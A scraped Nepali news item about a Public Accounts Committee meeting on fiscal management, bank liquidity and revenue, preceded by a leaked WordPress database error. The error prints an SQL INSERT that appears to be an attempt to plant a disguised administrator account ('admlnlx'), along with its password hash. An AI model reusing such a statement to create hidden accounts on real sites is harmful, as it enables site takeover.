WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6hTNm5MZ30IpC4nozrh5ywSsmXyv80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:15:22', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २४-
व्यवस्थापिका संसदअन्तर्गत सार्वजनिक लेखा समितिको बैठक सोमबार बस्दैछ। बिहान ११ बजे बस्ने बैठकमा मुलुकको वित्तीय व्वस्थापन, माैद्रिक तरलता र राजश्व परिचालनबारे छलफल हुने समितिका सभापति डोरप्रसाद उपाध्यायले जानकारी दिए।
उनका अनुसार नेपाल राष्ट्र बैंकका गभर्नर चिरञ्जिवी नेपाल र अर्थ मन्त्रालयका सचिव शान्तराज सुवेदीलाई पनि छलफलका लागि बैठकमा बोलाइएको छ। पूँजीगत बजेट खर्च हुन नसकेको, सरकारको ढुकुटीमा पैसा थुप्रिएको र बैंकहरुले तरलता अभाव भोगिरहेकाले यिनै विषयमा छलफल गर्न लागिएको सभापति उपाध्यायले बताए। उपाध्याय सभापतिमा निर्वाचित भएपछि पहिलो पटक समितिको बैठक बस्न लागेको हो। उनले नेकपा एमालेका सांसद पशुपति चौलागाइँलाई ७ मतले पराजित गरेका थिए।
माओवादी सांसद जनादर्न शर्मा मन्त्री भएपछि सभापति पद रिक्त हुँदा ६ महिनाभन्दा लामो समयदेखि समितिको बैठक बस्न सेकेको थिएन।